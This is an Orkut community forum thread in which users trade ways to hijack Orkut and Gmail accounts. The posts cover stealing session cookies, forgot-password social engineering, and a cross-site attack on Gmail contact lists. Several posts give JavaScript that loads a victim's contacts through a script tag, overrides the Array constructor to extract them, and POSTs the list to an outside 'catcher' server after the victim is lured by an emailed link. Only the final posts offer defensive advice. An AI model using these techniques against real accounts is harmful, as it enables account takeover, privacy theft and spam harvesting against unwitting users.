 | Jun 16 today i found a special thing (2 days ago) Before we were abel to access gmail account form orkut C00KIE but then bug was fixed But today I found a special thing to login into gmail account You can create the gmail cookie bye geeting some more data of C00KIE by little modification in orkut COOKIE stealing script. I have not tried but iam sure it can be used for IE also. So, start your experimentation. HINT is .www.orkut.com happy h@cking | |
| | Jun 16 warning(2 days ago) don't hack any one just try all tricks on ur fake profiles. H@cking is a bad thing so, don't h@ck any one Don't H@ack innocent peoples above data provided just to share knowledge | |
 ' | Jun 16 is it true(2 days ago)  | |
 Sid | Jun 16 xplain it plzzzzz (2 days ago) | |
| Anonymous | Jun 16 (2 days ago) hmmm never tried this before ... lemme check orkut cookie has 6 parts gmail cookie has 17 parts (although most of the parts remain same for all users) orkut cookie structure ORKUTPREF=ID=[Profile ID]: INF=0:SET=:LNG=1:CNT=91:RM=0:USR=[Base64 of your email]: PHS=:TS=:LCL=en-US:NET=1:TOS=:GC=[Base 64 of SID]: PE=[Base64 of your email]:GT1=1:GID:[Again base64 of email]: S=[base64 of some data] gmail cookie structure [dont know  ]hmmm... now whats the next step???? Mr Nobody here | |
| Anonymous | Jun 16 (2 days ago) i think in gmail we hav everything except for PREF value and GX value ... am i right??? Mr Nobody here | |
| Sid | Jun 16 @ALLhttp://www.orkut.com/CommMsgs.aspx?(2 days ago) | |
 Bad sectors | Jun 16 we can find GX value 4m orkut cookie (2 days ago) | |
 Hugσ яαƒαєl ●๋• | Jun 16 hmm, it does make sense, but if you have the gmail cookie of someone, you can easily sign in on his orkut, ive done that through some link which check your gmail cookie and carries you to a orkut page (2 days ago) | |
 *Anas!=] | Jun 17 explain plz (20 hours ago) |
| | Jun 17 Hugσ яαƒαєl ●๋•(20 hours ago) your english is quite good | |
| Anonymous | Jun 17 ^^^^^^^^^^^^^^^^^^^^(20 hours ago) forget the English ... tell me how to move forward Nobody here uid=7033552749200404104 this is my temp profile | |
| *Anas!=] | Jun 17 yea same question plz tell us about the cookies? (20 hours ago) | |
| Anonymous | Jun 17 @ Mr. Nobody(19 hours ago) for most profiles using gmail or yahoo u really don't need cookies to open... orkut n forgot password link will be ur bigest help in opening dese accounts... man dis is called social engineering.. try it | |
| Hugσ яαƒαєl ●๋• | Jun 18 Hugσ яαƒαєl ●๋•(18 hours ago) your english is quite good you jokin? -.- well, if you use firefox download the plugin called "Tamper data" and sign in on orkut, this url that i told about it will appear | |
| Hugσ яαƒαєl ●๋• | Jun 18 rememberme=true; PREF=ID=:TM=1180740125:LM=1181236785:GM=(18 hours ago) thats a google cookie example if you have one, log on it then go to www.orkut.com and thats the link: https://www.google.com/accounts/CheckCoo | |
| Anonymous | 10:28 am 10:27 am(0 minutes ago) this is how a GMAIL COOKIE LOOKS LIKE(9 hours ago) __utma=173272373.631576527.1182142063.11 changed a few codes to protct users privacy | |
| Anonymous | 10:48 am A simple gmail hack(8 hours ago) google as we all knw uses JSDN interface relying completely on cookies. So a simple malicious code can steal any private data for eg. ur entire contact list dis hapns cuz google stores dis contact list data in a jsp file. the attack works on all da java enabled browsers IE, FF n opera... list continues It can be exploit by writing a callback function in Javascript, that can do anything, and then passing it to the above link, which gives your function all the users contact info. It's a problem with web services that comes from an assumption that JavaScript cross-domain security is in place. the problem ouccurs at 2 points 1) When you rely on cookies to perform the implicit authentication that reveals the data. 2) When you allow rendering of the data in JSON which bypasses JavaScript cross-domain security here is a exrtemely simple explaination for da baove process Here's the super simple explanation [voilet] 1. Gmail sets a cookie saying you're logged in 2. A [3rd party] javascript tells you to call Google's script 3. Google checks for the Gmail cookie 4. The cookie is valid 5. Google hands over the requested data to you If [3rd party] wanted to keep your contact list, the javascript would pass it to a form and your computer would happily upload the list to [3rd party]'s server. At no point does [3rd party] make any request to Google. [/voliet] a simple javascript to verify dis hack will be provided if da mods find dis place safe enuf for public disclousre of such hacks...  | |
| Anonymous | 11:30 am Sure buddy .. I think u must continue .. this place is perfect to share new hacking stuff's as this is apart from stupid stuff's such as games, chats etc .. I have requested owner to make it moderated and change its name to OUG - Stealth Mode or if not these just remove the OUG tag and share awesome stuff's here (8 hours ago)  | |
| Anonymous | 11:42 am WTF(7 hours ago) great stuff posted here orkut deleted pritul and the person who the posted the stuff orkut is spying on us Nobody here uid=7033552749200404104 this is my temp profile |
| I am | 11:51 am damn orkut deleted me again...(7 hours ago) n guys i knw dis ain't orkut... dis is a idiotic brazilian | |
| ☜ ☩ ∝ ⇔ ☤ ☥ ☮ ☏✡ | 12:10 pm lolz .. whosoever is that .. let it keep on deleting .. lets c how many times (7 hours ago) I guess its easy for me to make a new profile than his deleting mine  Go On .. Pritul | |
| ☜ ☩ ∝ ⇔ ☤ ☥ ☮ ☏✡ | 12:31 pm I am ....(7 hours ago) Please continue with ur javascript .. we r waiting Pritul | |
| I am | 1:22 pm <html> (6 hours ago) <head> <script> function google(a) { document.write("<ol>"); for (i = 0; i < a.Body.Contacts.length; i++) { document.write("<li>" + a.Body.Contacts.Email + "</li>"); } document.write("</ol>"); } </script> <script src="http://docs.google.com/data/contac <body> Hello </body> </html> | |
| I am | 1:24 pm There is a Google URL that returns some script containing your contacts:(6 hours ago) http://docs.google.com/data/contacts?ou this page was being used in da script too PS: this page no longer exists. u'll have to search urself for the shifted version. The page used to look something like this: google ({ Success: true, Errors: [], Body: { AuthToken: { Value: '********' }, Contacts: [ { Id: '***', Email: 'users at dwr.dev.java.net', Affinity: ***, Groups: [ { id: '^Freq', value: 'users at dwr.dev.java.net' } ], Addressess: [], Phoness: [], Imss: [] }, // Lots more contacts here ] } }) | |
| I am | 1:26 pm So we're calling a function "google()" and passing it a data structure that includes all your contacts. So all we need to do is to do something with this data. The page I linked-to earlier creates a list from it using code like this:(6 hours ago) <script type="text/javascript"> function google(data){ var emails, i; for (i = 0; i < data.Body.Contacts.length; i++) { mails += "<li>" + data.Body.Contacts.Email + "</li>"; } document.write("<ol>" + emails + "</ol>"); } </script> <script type="text/javascript" src="http://docs.google.com/data/contac </script> | |
| I am | 1:28 pm But it would be just as easy to post the list of addresses off to some spam address catcher service:(6 hours ago) <script type="text/javascript"> function google(data){ var body, i; for (i = 0; i < data.Body.Contacts.length; i++) { body += data.Body.Contacts.Email + "n"; } var xhr = new ActiveXObject("Microsoft.XMLHTTP"); xhr.open("POST", "http://****.***/catcher"); xhr.send(body); } </script> | |
| I am | 1:44 pm explanation for the dummies(5 hours ago) http://mail.google.com/mail/?view=page& clicking on this link will return the anonymous Array of your email contacts. One thing you’ll notice is a conspicuous while loop at the top of the array. now a comand activating a google function can be run by a cross domain without actually requiring a google authentication to read ur contact list this is well known as a CSRF(Cross Site Request Forgery) attack. | |
| I am | 1:52 pm Attack Details(5 hours ago) 1) Email a GMail account a link and click. example: http://foo/index.html 2) HTML of http://foo/index.html The single line of HTML below forces the web browser to automatically send an off-domain HTTP request to GMail. If the victim is logged-in(obviously the case when you email a GMail account), the session cookies will be sent along with the request, and the response contains the contact list. The URL was predictable across all users. Page URL: http://foo/index.html <*script src="http://mail.google.com/mail/?_url_ 3) Sample content of http://mail.google.com/mail/?_url_scrub The JavaScript line below contains an unreferenced array constant with your contact list of email addresses. [["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ] GMail normally sends an XmlHttpRequest (XHR) to get this data on the fly where its then eval'ed in the browser and assigned to a variable. However in our case, the constant is loaded into JavaScript space on (http://foo/index.html) using a script tag, so its never assigned to a variable. This means accessing the data requires something more. | |
| I am | 1:53 pm (5 hours ago) 4) Accessing the contact list When JavaScript parses and interprets the unreferenced array the Array constructor is called. Its possible to overwrite the internal Array constructor with our own to access the contact list. The new Array constructor uses a setters to trigger events, then parses out the data we want, and prints the data to screen. var table = document.createElement('table'); table.id = 'content'; table.cellPadding = 3; table.cellSpacing = 1; table.border = 0; function Array() { var obj = this; var ind = 0; var getNext; getNext = function(x) { obj[ind++] setter = getNext; if(x) { var str = x.toString(); if ((str != 'ct') &&amp;amp; (typeof x != 'object') && (str.match(/@/))) { var row = table.insertRow(-1); var td = row.insertCell(-1); td.innerHTML = str; } } }; this[ind++] setter = getNext; } function readGMail() { document.body.appendChild(table); } |
I am
1:53 pm(5 hours ago)
moral of the story(5 hours ago) Don't put sensitive data in pure JavaScript files. Wrap HTML tags around the data to protect it from script tags.
If JavaScript files must contain sensitive information, make the URL unpredictable.
And/Or...
Make sure the file cannot be accessed by anything with an off-domain referer.
Vijay
7:45 pm(11 minutes ago)
Very nice discussion going on...(11 minutes ago) I really didn't know that Google's security is so vurnerable that websites can aquire sensitive private data by querying URLs.. AFAIK, these URLs can be obtained by crunching client side code..
I think blocking requests based on Referer may be the only solution to this - or browsers need to be upgraded to take care that cookie information is not passed by while loading website Y from the HTML/JS source of website X.
I am delighted to see such nice discussion going on here.
